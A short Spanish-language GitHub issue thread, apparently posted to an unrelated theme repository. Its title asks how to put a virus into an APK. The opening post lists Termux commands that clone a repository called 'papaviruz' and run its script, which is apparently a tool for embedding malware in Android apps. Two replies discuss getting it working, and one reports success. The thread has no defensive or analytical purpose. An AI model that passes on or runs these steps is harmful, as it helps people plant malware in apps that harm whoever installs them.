### ISSUE TITLE
Como meterle virus a un apk

### ISSUE THREAD

**Issue by Anonymous0508** [pages-themes/hacker#57]
$ pkg update 
$ pkg upgrade 
$ pkg install bash 
$ apt install pv 
$ pkg install git 
$ git clone https://github.com/Hacking-pch/papaviruz 
$ cd papaviruz 
$ chmod +x papaviruz.sh 
$ bash papaviruz.sh

**Comment by Green2049** [comment]
No Me Aparecen Las Apk Y Sale Que Se Movió Y Nada

**Comment by Anonymous0508** [comment]
Te pasaré el link de mi vídeo de cómo lo hice

**Comment by Green2049** [comment]
Gracias Hermano Ya Probé Y Me Sirvió Descargue Otro Explorador De Archivos Ya Que No Me Aparecían en La De Es File Explorer
